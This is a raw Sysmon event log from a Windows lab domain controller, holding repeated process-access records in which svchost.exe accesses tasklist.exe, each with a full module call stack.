21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 